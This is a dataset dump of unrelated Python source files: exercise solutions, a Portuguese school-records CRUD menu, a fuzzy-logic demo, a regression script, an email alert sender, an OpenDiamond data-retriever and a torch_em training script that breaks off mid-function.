seq_id (string, 7–11 chars) | text (string, 156–1.7M chars) | repo_name (string, 7–125 chars) | sub_path (string, 4–132 chars) | file_name (string, 4–77 chars) | file_ext (string, 6 classes) | file_size_in_byte (int64, 156–1.7M) | program_lang (string, 1 class) | lang (string, 38 classes) | doc_type (string, 1 class) | stars (int64, 0–24.2k, may be null) | dataset (string, 1 class) | pt (string, 1 class)
---|---|---|---|---|---|---|---|---|---|---|---|---
6425932746
|
# Demi, an office worker, sometimes works overtime, and working overtime builds up overtime fatigue.
# Overtime fatigue is the sum of the squares of the remaining workloads at the moment overtime starts.
# Demi will work for N hours in a way that minimizes overtime fatigue.
# Given that Demi can finish 1 unit of work per hour, and given the N hours left before leaving work
# and the workload of each task in works, complete the function solution that returns the minimized
# overtime fatigue.
# Constraints
# works is an array with length between 1 and 20,000.
# Each element of works is a natural number no greater than 50,000.
# n is a natural number no greater than 1,000,000.
# def solution(n: int, works: [int]) -> int:
# if n>sum(works): return 0
# works.sort(reverse = True)
# while n>0:
# max_idx = works.index(max(works))
# works[max_idx]-=1
# n-=1
# return sum(item**2 for item in works)
def no_overtime(n: int, works: [int]) -> int:
if n>=sum(works): return 0
from heapq import heappush, heappop
max_heap = []
for work in works:
heappush(max_heap, (-work, work))
while n>0:
tmp = heappop(max_heap)[1]
heappush(max_heap, (1-tmp, tmp-1))
n-=1
return sum(item[1]**2 for item in max_heap)
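# Illustrative check (added as a sketch, not part of the original solution file):
# with n=4 and works=[4, 3, 3], repeatedly reducing the largest remaining job
# leaves [2, 2, 2], so the minimum overtime fatigue is 3 * 2**2 == 12.
if __name__ == "__main__":
    assert no_overtime(4, [4, 3, 3]) == 12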
|
script-brew/2019_KCC_Summer_Study
|
programmers/Lv_3/MaengSanha/noOvertime.py
|
noOvertime.py
|
py
| 1,382 |
python
|
ko
|
code
| 0 |
github-code
|
6
|
41409285856
|
import json
estudantes = []
professores = []
disciplinas = []
turmas = []
matriculas = []
def main():
while True:
print("Menu Principal")
print("1. Estudantes")
print("2. Disciplinas")
print("3. Professores")
print("4. Turmas")
print("5. Matrículas")
print("6. Sair")
opcao_principal = input("Escolha uma opção: ")
if opcao_principal == "1":
print("Você escolheu a opção Estudantes.")
menu_operacoes_estudantes()
elif opcao_principal == "2":
print("Você escolheu a opção Disciplinas.")
menu_operacoes_disciplinas()
elif opcao_principal == "3":
print("Você escolheu a opção Professores.")
menu_operacoes_professores()
elif opcao_principal == "4":
print("Você escolheu a opção Turmas.")
menu_operacoes_turmas()
elif opcao_principal == "5":
print("Você escolheu a opção Matrículas.")
menu_operacoes_matriculas()
elif opcao_principal == "6":
print("Saindo...")
break
else:
print("Opção inválida. Tente novamente.")
def menu_operacoes_estudantes():
while True:
print("\nMenu de Operações - Estudantes")
print("1. Incluir")
print("2. Listar")
print("3. Atualizar")
print("4. Excluir")
print("5. Voltar ao menu principal")
opcao_operacoes = input("\nEscolha uma opção: ")
if opcao_operacoes == "1":
incluir_estudante()
elif opcao_operacoes == "2":
listar_estudantes()
elif opcao_operacoes == "3":
atualizar_estudante()
elif opcao_operacoes == "4":
excluir_estudante()
elif opcao_operacoes == "5":
break
else:
print("Opção inválida. Tente novamente.")
def incluir_estudante():
codigo = int(input("\nDigite o código do estudante: "))
nome = input("\nDigite o nome do estudante: ")
cpf = input("\nDigite o CPF do estudante: ")
estudantes = recuperar_estudantes()
estudantes.append({"codigo": codigo, "nome": nome, "cpf": cpf})
salvar_estudantes(estudantes)
print(f"Estudante {nome} incluído com sucesso!")
def listar_estudantes():
estudantes = recuperar_estudantes()
if len(estudantes) == 0:
print("\nNão há estudantes cadastrados.")
else:
print("\nEstudantes cadastrados:")
for estudante in estudantes:
print(f"- Código: {estudante['codigo']}, Nome: {estudante['nome']}, CPF: {estudante['cpf']}")
def atualizar_estudante():
codigo = int(input("\nDigite o código do estudante que deseja atualizar: "))
estudantes = recuperar_estudantes()
for estudante in estudantes:
if estudante["codigo"] == codigo:
novo_codigo = int(input("\nDigite o novo código do estudante: "))
novo_nome = input("\nDigite o novo nome do estudante: ")
novo_cpf = input("\nDigite o novo CPF do estudante: ")
estudante["codigo"] = novo_codigo
estudante["nome"] = novo_nome
estudante["cpf"] = novo_cpf
salvar_estudantes(estudantes)
print(f"Estudante {codigo} atualizado com sucesso!")
return
print(f"Estudante com código {codigo} não encontrado.")
def excluir_estudante():
codigo = int(input("\nDigite o código do estudante que deseja excluir: "))
estudantes = recuperar_estudantes()
for i, estudante in enumerate(estudantes):
if estudante["codigo"] == codigo:
del estudantes[i]
salvar_estudantes(estudantes)
print(f"Estudante {codigo} excluído com sucesso!")
return
print(f"Estudante com código {codigo} não encontrado.")
def salvar_estudantes(estudantes):
with open('estudantes.json', 'w') as f:
json.dump(estudantes, f)
def recuperar_estudantes():
try:
with open('estudantes.json', 'r') as f:
return json.load(f)
except FileNotFoundError:
return []
def menu_operacoes_professores():
while True:
print("\nMenu de Operações - Professores")
print("1. Incluir")
print("2. Listar")
print("3. Atualizar")
print("4. Excluir")
print("5. Voltar ao menu principal")
opcao_operacoes = input("\nEscolha uma opção: ")
if opcao_operacoes == "1":
incluir_professor()
elif opcao_operacoes == "2":
listar_professores()
elif opcao_operacoes == "3":
atualizar_professor()
elif opcao_operacoes == "4":
excluir_professor()
elif opcao_operacoes == "5":
break
else:
print("Opção inválida. Tente novamente.")
def incluir_professor():
codigo = int(input("\nDigite o código do professor: "))
nome = input("\nDigite o nome do professor: ")
cpf = input("\nDigite o CPF do professor: ")
professores = recuperar_professores()
professores.append({"codigo": codigo, "nome": nome, "cpf": cpf})
salvar_professores(professores)
print(f"Professor {nome} incluído com sucesso!")
def listar_professores():
professores = recuperar_professores()
if len(professores) == 0:
print("\nNão há professores cadastrados.")
else:
print("\nProfessores cadastrados:")
for professor in professores:
print(f"- Código: {professor['codigo']}, Nome: {professor['nome']}, CPF: {professor['cpf']}")
def atualizar_professor():
codigo = int(input("\nDigite o código do professor que deseja atualizar: "))
professores = recuperar_professores()
for professor in professores:
if professor["codigo"] == codigo:
novo_codigo = int(input("\nDigite o novo código do professor: "))
novo_nome = input("\nDigite o novo nome do professor: ")
novo_cpf = input("\nDigite o novo CPF do professor: ")
professor["codigo"] = novo_codigo
professor["nome"] = novo_nome
professor["cpf"] = novo_cpf
salvar_professores(professores)
print(f"Professor {codigo} atualizado com sucesso!")
return
print(f"Professor com código {codigo} não encontrado.")
def excluir_professor():
codigo = int(input("\nDigite o código do professor que deseja excluir: "))
professores = recuperar_professores()
for i, professor in enumerate(professores):
if professor["codigo"] == codigo:
del professores[i]
salvar_professores(professores)
print(f"Professor {codigo} excluído com sucesso!")
return
print(f"Professor com código {codigo} não encontrado.")
def salvar_professores(professores):
with open('professores.json', 'w') as f:
json.dump(professores, f)
def recuperar_professores():
try:
with open('professores.json', 'r') as f:
return json.load(f)
except FileNotFoundError:
return []
def menu_operacoes_disciplinas():
while True:
print("\nMenu de Operações - Disciplinas")
print("1. Incluir")
print("2. Listar")
print("3. Atualizar")
print("4. Excluir")
print("5. Voltar ao menu principal")
opcao_operacoes = input("\nEscolha uma opção: ")
if opcao_operacoes == "1":
incluir_disciplina()
elif opcao_operacoes == "2":
listar_disciplinas()
elif opcao_operacoes == "3":
atualizar_disciplina()
elif opcao_operacoes == "4":
excluir_disciplina()
elif opcao_operacoes == "5":
break
else:
print("Opção inválida. Tente novamente.")
def incluir_disciplina():
codigo = int(input("\nDigite o código da disciplina: "))
nome = input("\nDigite o nome da disciplina: ")
disciplinas = recuperar_disciplinas()
disciplinas.append({"codigo": codigo, "nome": nome})
salvar_disciplinas(disciplinas)
print(f"Disciplina {nome} incluída com sucesso!")
def listar_disciplinas():
disciplinas = recuperar_disciplinas()
if len(disciplinas) == 0:
print("\nNão há disciplinas cadastradas.")
else:
print("\nDisciplinas cadastradas:")
for disciplina in disciplinas:
print(f"- Código: {disciplina['codigo']}, Nome: {disciplina['nome']}")
def atualizar_disciplina():
codigo = int(input("\nDigite o código da disciplina que deseja atualizar: "))
disciplinas = recuperar_disciplinas()
for disciplina in disciplinas:
if disciplina["codigo"] == codigo:
novo_codigo = int(input("\nDigite o novo código da disciplina: "))
novo_nome = input("\nDigite o novo nome da disciplina: ")
disciplina["codigo"] = novo_codigo
disciplina["nome"] = novo_nome
salvar_disciplinas(disciplinas)
print(f"Disciplina {codigo} atualizada com sucesso!")
return
print(f"Disciplina com código {codigo} não encontrada.")
def excluir_disciplina():
codigo = int(input("\nDigite o código da disciplina que deseja excluir: "))
disciplinas = recuperar_disciplinas()
for i, disciplina in enumerate(disciplinas):
if disciplina["codigo"] == codigo:
del disciplinas[i]
salvar_disciplinas(disciplinas)
print(f"Disciplina {codigo} excluída com sucesso!")
return
print(f"Disciplina com código {codigo} não encontrada.")
def salvar_disciplinas(disciplinas):
with open('disciplinas.json', 'w') as f:
json.dump(disciplinas, f)
def recuperar_disciplinas():
try:
with open('disciplinas.json', 'r') as f:
return json.load(f)
except FileNotFoundError:
return []
def menu_operacoes_turmas():
while True:
print("\nMenu de Operações - Turmas")
print("1. Incluir")
print("2. Listar")
print("3. Atualizar")
print("4. Excluir")
print("5. Voltar ao menu principal")
opcao_operacoes = input("\nEscolha uma opção: ")
if opcao_operacoes == "1":
incluir_turma()
elif opcao_operacoes == "2":
listar_turmas()
elif opcao_operacoes == "3":
atualizar_turma()
elif opcao_operacoes == "4":
excluir_turma()
elif opcao_operacoes == "5":
break
else:
print("Opção inválida. Tente novamente.")
def incluir_turma():
codigo = int(input("\nDigite o código da turma: "))
codigo_professor = int(input("\nDigite o código do professor: "))
codigo_disciplina = int(input("\nDigite o código da disciplina: "))
professores = recuperar_professores()
if not any(professor["codigo"] == codigo_professor for professor in professores):
print(f"Professor com código {codigo_professor} não encontrado.")
return
disciplinas = recuperar_disciplinas()
if not any(disciplina["codigo"] == codigo_disciplina for disciplina in disciplinas):
print(f"Disciplina com código {codigo_disciplina} não encontrada.")
return
turmas = recuperar_turmas()
turmas.append({"codigo": codigo, "codigo_professor": codigo_professor, "codigo_disciplina": codigo_disciplina})
salvar_turmas(turmas)
print(f"Turma {codigo} incluída com sucesso!")
def listar_turmas():
turmas = recuperar_turmas()
if len(turmas) == 0:
print("\nNão há turmas cadastradas.")
else:
print("\nTurmas cadastradas:")
for turma in turmas:
print(f"- Código: {turma['codigo']}, Código do Professor: {turma['codigo_professor']}, Código da Disciplina: {turma['codigo_disciplina']}")
def atualizar_turma():
codigo = int(input("\nDigite o código da turma que deseja atualizar: "))
turmas = recuperar_turmas()
for turma in turmas:
if turma["codigo"] == codigo:
novo_codigo = int(input("\nDigite o novo código da turma: "))
novo_codigo_professor = int(input("\nDigite o novo código do professor: "))
novo_codigo_disciplina = int(input("\nDigite o novo código da disciplina: "))
professores = recuperar_professores()
if not any(professor["codigo"] == novo_codigo_professor for professor in professores):
print(f"Professor com código {novo_codigo_professor} não encontrado.")
return
disciplinas = recuperar_disciplinas()
if not any(disciplina["codigo"] == novo_codigo_disciplina for disciplina in disciplinas):
print(f"Disciplina com código {novo_codigo_disciplina} não encontrada.")
return
turma["codigo"] = novo_codigo
turma["codigo_professor"] = novo_codigo_professor
turma["codigo_disciplina"] = novo_codigo_disciplina
salvar_turmas(turmas)
print(f"Turma {codigo} atualizada com sucesso!")
return
print(f"Turma com código {codigo} não encontrada.")
def excluir_turma():
codigo = int(input("\nDigite o código da turma que deseja excluir: "))
turmas = recuperar_turmas()
for i, turma in enumerate(turmas):
if turma["codigo"] == codigo:
del turmas[i]
salvar_turmas(turmas)
print(f"Turma {codigo} excluída com sucesso!")
return
print(f"Turma com código {codigo} não encontrada.")
def salvar_turmas(turmas):
with open('turmas.json', 'w') as f:
json.dump(turmas, f)
def recuperar_turmas():
try:
with open('turmas.json', 'r') as f:
return json.load(f)
except FileNotFoundError:
return []
def menu_operacoes_matriculas():
while True:
print("\nMenu de Operações - Matrículas")
print("1. Incluir")
print("2. Listar")
print("3. Atualizar")
print("4. Excluir")
print("5. Voltar ao menu principal")
opcao_operacoes = input("\nEscolha uma opção: ")
if opcao_operacoes == "1":
incluir_matricula()
elif opcao_operacoes == "2":
listar_matriculas()
elif opcao_operacoes == "3":
atualizar_matricula()
elif opcao_operacoes == "4":
excluir_matricula()
elif opcao_operacoes == "5":
break
else:
print("Opção inválida. Tente novamente.")
def incluir_matricula():
codigo_turma = int(input("\nDigite o código da turma: "))
codigo_estudante = int(input("\nDigite o código do estudante: "))
turmas = recuperar_turmas()
if not any(turma["codigo"] == codigo_turma for turma in turmas):
print(f"Turma com código {codigo_turma} não encontrada.")
return
estudantes = recuperar_estudantes()
if not any(estudante["codigo"] == codigo_estudante for estudante in estudantes):
print(f"Estudante com código {codigo_estudante} não encontrado.")
return
matriculas = recuperar_matriculas()
matriculas.append({"codigo_turma": codigo_turma, "codigo_estudante": codigo_estudante})
salvar_matriculas(matriculas)
print(f"Matrícula na turma {codigo_turma} incluída com sucesso!")
def listar_matriculas():
matriculas = recuperar_matriculas()
if len(matriculas) == 0:
print("\nNão há matrículas cadastradas.")
else:
print("\nMatrículas cadastradas:")
for matricula in matriculas:
print(f"- Código da Turma: {matricula['codigo_turma']}, Código do Estudante: {matricula['codigo_estudante']}")
def atualizar_matricula():
codigo_turma = int(input("\nDigite o código da turma da matrícula que deseja atualizar: "))
codigo_estudante = int(input("\nDigite o código do estudante da matrícula que deseja atualizar: "))
matriculas = recuperar_matriculas()
for matricula in matriculas:
if matricula["codigo_turma"] == codigo_turma and matricula["codigo_estudante"] == codigo_estudante:
novo_codigo_turma = int(input("\nDigite o novo código da turma: "))
novo_codigo_estudante = int(input("\nDigite o novo código do estudante: "))
turmas = recuperar_turmas()
if not any(turma["codigo"] == novo_codigo_turma for turma in turmas):
print(f"Turma com código {novo_codigo_turma} não encontrada.")
return
estudantes = recuperar_estudantes()
if not any(estudante["codigo"] == novo_codigo_estudante for estudante in estudantes):
print(f"Estudante com código {novo_codigo_estudante} não encontrado.")
return
matricula["codigo_turma"] = novo_codigo_turma
matricula["codigo_estudante"] = novo_codigo_estudante
salvar_matriculas(matriculas)
print(f"Matrícula na turma {codigo_turma} atualizada com sucesso!")
return
print(f"Matrícula na turma {codigo_turma} com estudante de código {codigo_estudante} não encontrada.")
def excluir_matricula():
codigo_turma = int(input("\nDigite o código da turma da matrícula que deseja excluir: "))
codigo_estudante = int(input("\nDigite o código do estudante da matrícula que deseja excluir: "))
matriculas = recuperar_matriculas()
for i, matricula in enumerate(matriculas):
if matricula["codigo_turma"] == codigo_turma and matricula["codigo_estudante"] == codigo_estudante:
del matriculas[i]
salvar_matriculas(matriculas)
print(f"Matrícula na turma {codigo_turma} excluída com sucesso!")
return
print(f"Matrícula na turma {codigo_turma} com estudante de código {codigo_estudante} não encontrada.")
def salvar_matriculas(matriculas):
with open('matriculas.json', 'w') as f:
json.dump(matriculas, f)
def recuperar_matriculas():
try:
with open('matriculas.json', 'r') as f:
return json.load(f)
except FileNotFoundError:
return []
if __name__ == "__main__":
main()
|
enzupain/Python-Projetos
|
sistema gerenciamento academico.py
|
sistema gerenciamento academico.py
|
py
| 18,786 |
python
|
pt
|
code
| 0 |
github-code
|
6
|
31221042600
|
'''num=int(input("enter a number below 30: "))
if num>0 and num<10:
print("the number is between 0 and 10")
if num>=10 and num<20: # PROMPT METHOD
print("the number is between 10 and 20")
if num>=20 and num<30:
print("the number is between 20 and 30")'''
a= int(input("enter a:"))
b= int(input("enter b:"))
c= int(input("enter c:"))
if a>b and a>c:
    print("a is greater than all")
elif b>a and b>c:
    print("b is greater than all")
elif c>b and c>a:
    print("c is greater than all")
else:
    print("no single value is greatest (at least two of a, b, c are equal)")
|
Manikantakalla123/training-phase1
|
range.py
|
range.py
|
py
| 596 |
python
|
en
|
code
| 0 |
github-code
|
6
|
10620073145
|
#!/usr/bin/python
import unittest
import sys
sys.path.insert(0, '../src')
from Weapon import Weapon
from Character import Character
from Clock import Clock
from Dice import Dice
class WeaponTest(unittest.TestCase):
def setUp(self):
sut_skills = []
sut_ability_set = {}
sut_cooldown_set = {}
sut_cooldown_adj_set = {}
sut_strength_set = {}
sut_stats = {}
sut_handed = []
self.sut = Weapon(
weapon_type='sword',
quality='common',
color='white',
skills=sut_skills,
handed=sut_handed,
damage='slash',
stats=sut_stats,
ability_set=sut_ability_set,
cd_timer_set=sut_cooldown_set,
cd_adj_set=sut_cooldown_adj_set,
strength_set=sut_strength_set,
weapon_id=1,
dice=Dice(attack=2, defense=2, morale=2)
)
def test_get_weapon_type(self):
self.assertEqual('sword', self.sut.weapon_type)
if __name__ == '__main__':
unittest.main()
|
jaycarson/fun
|
app/tst/WeaponTest.py
|
WeaponTest.py
|
py
| 1,076 |
python
|
en
|
code
| 0 |
github-code
|
6
|
7160469481
|
import skfuzzy as fuzz
from skfuzzy import control as ctrl
import numpy as np
import matplotlib.pyplot as plt
def v(d, a):
return np.sqrt((d * 9.81) / np.sin(2 * np.radians(a)))
def main():
x_distance = np.arange(1, 100, 5)
x_angle = np.arange(1, 90, 1)
distance = ctrl.Antecedent(x_distance, 'distance')
angle = ctrl.Antecedent(x_angle, 'angle')
velocity = ctrl.Consequent(np.arange(0, 100, 1), 'velocity')
distance.automf(3)
angle.automf(5)
velocity.automf(5)
# poor
# mediocre
# average
# decent
# good
rules = [
ctrl.Rule(distance['poor'], velocity['poor']),
ctrl.Rule(distance['average'] & (angle['mediocre'] | angle['average'] | angle['decent']), velocity['mediocre']),
ctrl.Rule(distance['average'] & (angle['poor'] | angle['good']), velocity['average']),
ctrl.Rule(distance['good'] & (angle['mediocre'] | angle['average'] | angle['decent']), velocity['mediocre']),
ctrl.Rule(distance['good'] & (angle['poor'] | angle['good']), velocity['good']),
]
velocity_ctrl = ctrl.ControlSystemSimulation(ctrl.ControlSystem(rules=rules))
mse = 0
i = 0
preds = []
for ang in x_angle:
for dst in x_distance:
i += 1
true = v(dst, ang)
velocity_ctrl.input['distance'] = dst
velocity_ctrl.input['angle'] = ang
velocity_ctrl.compute()
preds.append(velocity_ctrl.output['velocity'])
mse += (true - velocity_ctrl.output['velocity']) ** 2
mse /= i
print(f'MSE: {mse}')
X, Y = np.meshgrid(x_distance, x_angle)
Z = v(X, Y)
fig = plt.figure()
ax = fig.add_subplot(1, 2, 1, projection='3d')
ax.plot_surface(X, Y, Z, rstride=1, cstride=1,
cmap='viridis', edgecolor='none')
ax.set_title('Prawdziwa funkcja mocu rzutu')
ax.set_xlabel('dystans')
ax.set_ylabel('kat')
ax.set_zlabel('moc rzutu')
Z = np.array(preds).reshape(Z.shape)
ax = fig.add_subplot(1, 2, 2, projection='3d')
ax.plot_surface(X, Y, Z, rstride=1, cstride=1,
cmap='viridis', edgecolor='none')
ax.set_title('Predykcja funkcji mocu rzutu')
ax.set_xlabel('dystans')
ax.set_ylabel('kat')
ax.set_zlabel('moc rzutu')
plt.show()
if __name__ == '__main__':
main()
|
DonChaka/PSI
|
Fuzzy/fuzzy_easy.py
|
fuzzy_easy.py
|
py
| 2,354 |
python
|
en
|
code
| 0 |
github-code
|
6
|
72033875709
|
import numpy as np
import matplotlib.pyplot as plt
import pandas as pd
dataset = pd.read_csv('forestfires.csv')
pd.plotting.scatter_matrix(dataset)
X = dataset.iloc[:,0:12].values
y = dataset.iloc[:,-1].values
dataset.isnull().sum()
dataset.info()
temp = pd.DataFrame(X[:,[2,3]])
temp_month = pd.get_dummies(temp[0])
temp_day = pd.get_dummies(temp[1])
del(temp)
X = np.append(X,temp_month,axis = 1)
X = np.append(X,temp_day,axis = 1)
X = np.delete(X,2,axis =1)
X = np.delete(X,2,axis =1)
del(temp_month,temp_day)
temp = pd.DataFrame(X[:,:])
from sklearn.preprocessing import StandardScaler
st = StandardScaler()
X = st.fit_transform(X)
from sklearn.model_selection import train_test_split
X_train,X_test,y_train,y_test = train_test_split(X,y)
from sklearn.linear_model import LinearRegression
lr = LinearRegression()
lr.fit(X_train,y_train)
lr.score(X_test,y_test)
from sklearn.ensemble import RandomForestRegressor
ran = RandomForestRegressor(n_estimators = 5)
ran.fit(X_train,y_train)
ran.score(X_train,y_train)
#this is complete
|
Manavendrasingh/ML-code
|
forestfire.py
|
forestfire.py
|
py
| 1,103 |
python
|
en
|
code
| 0 |
github-code
|
6
|
5345020806
|
import email.utils
import json
import os
import smtplib
import ssl
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from pathlib import Path
import jinja2
from dotenv import load_dotenv
send_user = ""
load_dotenv()
class SendEmailController:
def __init__(self):
pass
@staticmethod
def render_mail_template(template_params, template_name):
html_template_url = Path(__file__).parents[1] / "mail_templates"
html_template_loader = jinja2.FileSystemLoader(html_template_url)
html_template = jinja2.Environment(loader=html_template_loader)
email_template = html_template.get_template(template_name)
compose_email_html = email_template.render(template_params)
return compose_email_html
@staticmethod
def config_send_mail(subject, receive_email, compose_email_html):
sender_email = os.getenv("SENDER_EMAIL")
sender_name = os.getenv("SENDER_NAME")
smtp_server = os.getenv("SMTP_SERVER")
smtp_port = os.getenv("SMTP_PORT")
password = os.getenv("MAIL_PASSWORD")
list_email_cc = []
msg = MIMEMultipart("mixed")
msg["Subject"] = subject
msg["From"] = email.utils.formataddr((sender_name, sender_email))
if receive_email.upper() == "Undetermined".upper():
msg["To"] = sender_email
else:
msg["To"] = receive_email
msg["Cc"] = ", ".join(list_email_cc)
msg.attach(MIMEText(compose_email_html, "html"))
context = ssl.create_default_context()
with smtplib.SMTP(smtp_server, int(smtp_port)) as smtp:
smtp.starttls(context=context)
smtp.login(sender_email, password)
smtp.send_message(msg)
smtp.quit()
@staticmethod
def send_email(receive_email, subject, template_params, template_file_name):
# subject, template_mail = SendEmailController.build_template(template_params)
# subject = "send email test"
# template_mail = {"text": "aloha"}
template_mail = template_params
compose_email_html = SendEmailController.render_mail_template(
template_mail, template_file_name
)
if subject and template_mail:
SendEmailController.config_send_mail(
subject, receive_email, compose_email_html
)
@staticmethod
def build_template(template_params):
data = json.dumps(template_params)
data = json.loads(data)
id = data.get("id")
time = data.get("time")
# email_to = data.get("email_to")
source_ip = data.get("source_ip", "")
destination = data.get("destination")
flow_count = data.get("flow_count", -1)
tenant = data.get("tenant")
vpc = data.get("vpc")
body_data = ""
subject = "[Violation]"
if id == 1:
category = "Policy violation"
subject = subject + " " + category
body_data = {
"category": category,
"time": time,
"source_ip": source_ip,
"destination": destination,
"tenant": tenant,
"vpc": vpc,
}
elif id == 2:
category = "DDoS Attack"
subject = subject + " " + category
body_data = {
"category": category,
"time": time,
"destination": destination,
"flow_count": flow_count,
"tenant": tenant,
"vpc": vpc,
}
elif id == 3:
category = "Possible Attack"
subject = subject + " " + category
body_data = {
"category": category,
"time": time,
"destination": destination,
"tenant": tenant,
"vpc": vpc,
}
return subject, body_data
|
nguyendoantung/e-maintenance-system
|
back-end/service/utils/email/EmailController.py
|
EmailController.py
|
py
| 3,978 |
python
|
en
|
code
| 0 |
github-code
|
6
|
1633248512
|
from builtins import next
from builtins import range
import os
import datetime
from xml.sax.saxutils import quoteattr
import sys
import logging
import random
import glob
from itertools import cycle
from flask import Blueprint, url_for, Response, stream_with_context, send_file, \
jsonify
from werkzeug.datastructures import Headers
from werkzeug.security import safe_join
from opendiamond.dataretriever.util import read_file_list, write_data
BASEURL = 'augment'
STYLE = False
LOCAL_OBJ_URI = True # if true, return local file path, otherwise http.
INDEXDIR = DATAROOT = None
ITEMS_PER_ITERATION = int(1e4)
KEYWORD = 'yellowthroat'
"""
Example url:
/augment/root/<ROOT_DIR>/distributed/<id>of<N>/ \
keywords/<d/r ([d]eterminant/[r]andom)>_<random_seed>_<base_rate>
/augment/root/STREAM/distributed/1of2/keywords/d_42_1.0
"""
def init(config):
global INDEXDIR, DATAROOT # pylint: disable=global-statement
INDEXDIR = 'STREAM'
DATAROOT = config.dataroot
scope_blueprint = Blueprint('augment_store', __name__)
_log = logging.getLogger(__name__)
@scope_blueprint.route('/root/<rootdir>/distributed/<int:index>of<int:total>' +
'/keywords/<params>')
@scope_blueprint.route('/root/<rootdir>/keywords/<params>')
@scope_blueprint.route('/root/<rootdir>/distributed/<int:index>of<int:total>' +
'/keywords/<params>/start/<int:start>/limit/<int:limit>')
@scope_blueprint.route('/root/<rootdir>/keywords/<params>' +
'/start/<int:start>/limit/<int:limit>')
def get_scope(rootdir, index=0, total=1, params=None, start=0, limit=sys.maxsize):
global KEYWORD
if rootdir == "0":
rootdir = INDEXDIR
rootdir = _get_obj_absolute_path(rootdir)
seed = None
percentage = 0.
seed, percentage = decode_params(params)
# Assuming the same positive list is present in all the servers
# Always create a new index file
base_list, KEYWORD = create_index(rootdir, percentage, seed, index, total)
total_entries = len(base_list)
start = start if start > 0 else 0
end = min(total_entries, start + limit) if limit > 0 else total_entries
base_list = base_list[start:end]
total_entries = end - start
def generate():
yield '<?xml version="1.0" encoding="UTF-8" ?>\n'
if STYLE:
yield '<?xml-stylesheet type="text/xsl" href="/scopelist.xsl" ?>\n'
yield '<objectlist count="{:d}">\n'.format(total_entries)
for path in base_list:
path = path.strip()
yield _get_object_element(object_path=path) + '\n'
yield '</objectlist>\n'
headers = Headers([('Content-Type', 'text/xml')])
return Response(stream_with_context(generate()),
status="200 OK",
headers=headers)
def decode_params(params):
"""
Decodes the params, which are '_'-separated:
<[d]eterminant/[r]andom>_<random_seed>_<base_rate>
"""
keywords = params.split('_')
mix_type = keywords[0]
seed = None
if len(keywords) > 1:
seed = int(keywords[1])
if mix_type == 'r' or seed is None:
seed = random.randrange(10000)
percentage = 0.1 # default base_rate = 0.1%
if len(keywords) > 2:
percentage = float(keywords[2])
return seed, round(percentage, 4)
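# Worked example (illustrative, not from the original module): decode_params("d_42_1.0")
# returns (42, 1.0), while decode_params("r") draws a random seed and falls back to the
# default base rate of 0.1%.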
@scope_blueprint.route('/id/<path:object_path>')
def get_object_id(object_path):
headers = Headers([('Content-Type', 'text/xml')])
return Response(_get_object_element(object_path=object_path),
"200 OK",
headers=headers)
def _get_object_element(object_path):
path = _get_obj_absolute_path(object_path)
meta = {'_gt_label': KEYWORD}
if KEYWORD in path:
return '<object id={} src={} meta={} />' \
.format(quoteattr(url_for('.get_object_id', object_path=object_path)),
quoteattr(_get_object_src_uri(object_path)),
quoteattr(url_for('.get_object_meta', present=True)))
return '<object id={} src={} />' \
.format(quoteattr(url_for('.get_object_id', object_path=object_path)),
quoteattr(_get_object_src_uri(object_path)))
@scope_blueprint.route('/meta/<path:present>')
def get_object_meta(present=False):
attrs = dict()
if present:
attrs['_gt_label'] = KEYWORD
return jsonify(attrs)
def _get_object_src_uri(object_path):
if LOCAL_OBJ_URI:
return 'file://' + _get_obj_absolute_path(object_path)
return url_for('.get_object_src_http', obj_path=object_path)
def _get_obj_absolute_path(obj_path):
return safe_join(DATAROOT, obj_path)
@scope_blueprint.route('/obj/<path:obj_path>')
def get_object_src_http(obj_path):
path = _get_obj_absolute_path(obj_path)
headers = Headers()
# With add_etags=True, conditional=True
# Flask should be smart enough to do 304 Not Modified
response = send_file(path,
cache_timeout=datetime.timedelta(
days=365).total_seconds(),
add_etags=True,
conditional=True)
response.headers.extend(headers)
return response
def create_index(base_dir, base_rate=0.05, seed=42, rank=0, total_servers=1):
"""
Creates the index list file.
Assumes the base directory contains file lists named NEGATIVE (e.g. a YFCC subset) and POSITIVE.
"""
filepath_split = ['STREAM', "{:.2f}".format(base_rate), str(rank), str(total_servers), str(seed)]
filepath = '_'.join(filepath_split)
filepath = os.path.join(base_dir, filepath)
positive_path = os.path.join(base_dir, 'POSITIVE')
negative_path = os.path.join(base_dir, 'NEGATIVE')
positive_firstline = open(positive_path).readline().rstrip()
keyword = positive_firstline.split('/')[-2] # Assuming all positives are in the same parent dir
_log.info("Dir {} BR: {} Seed:{} FP{}".format(base_dir, base_rate, seed, filepath))
sys.stdout.flush()
if not os.path.exists(filepath):
positive_data = read_file_list(positive_path) # same across servers
negative_data = read_file_list(negative_path) # different across servers
random.Random(seed).shuffle(positive_data)
random.Random(seed).shuffle(negative_data)
len_positive = len(positive_data)
start_idx = int(rank * (1.0 / total_servers) * len_positive)
end_idx = int((rank+1) * (1.0 / total_servers) * len_positive)
positive_data = positive_data[start_idx:end_idx]
len_positive = len(positive_data)
negative_sample = int(len_positive * (100./base_rate -1))
negative_data = negative_data[:negative_sample]
return write_data(filepath, [negative_data, positive_data], seed), keyword
return read_file_list(filepath), keyword
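# Naming sketch (illustrative): with the defaults base_rate=0.05, rank=0, total_servers=1 and
# seed=42, the index above is written to <base_dir>/STREAM_0.05_0_1_42, and each positive entry
# is mixed with int(100 / 0.05 - 1) = 1999 negatives to reach the requested base rate.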
|
cmusatyalab/opendiamond
|
opendiamond/dataretriever/augment_store.py
|
augment_store.py
|
py
| 6,831 |
python
|
en
|
code
| 19 |
github-code
|
6
|
655282827
|
import argparse
import os
import torch
import torch_em
from torch_em.model import AnisotropicUNet
ROOT = '/scratch/pape/mito_em/data'
def get_loader(datasets, patch_shape,
batch_size=1, n_samples=None,
roi=None):
paths = [
os.path.join(ROOT, f'{ds}.n5') for ds in datasets
]
raw_key = 'raw'
label_key = 'labels'
sampler = torch_em.data.MinForegroundSampler(min_fraction=0.05, p_reject=.75)
label_transform = torch_em.transform.label.connected_components
return torch_em.default_segmentation_loader(
paths, raw_key,
paths, label_key,
batch_size=batch_size,
patch_shape=patch_shape,
label_transform=label_transform,
sampler=sampler,
n_samples=n_samples,
num_workers=8*batch_size,
shuffle=True,
label_dtype=torch.int64
)
def get_model(large_model):
n_out = 12
if large_model:
print("Using large model")
model = AnisotropicUNet(
scale_factors=[
[1, 2, 2],
[1, 2, 2],
[2, 2, 2],
[2, 2, 2],
[2, 2, 2]
],
in_channels=1,
out_channels=n_out,
initial_features=128,
gain=2,
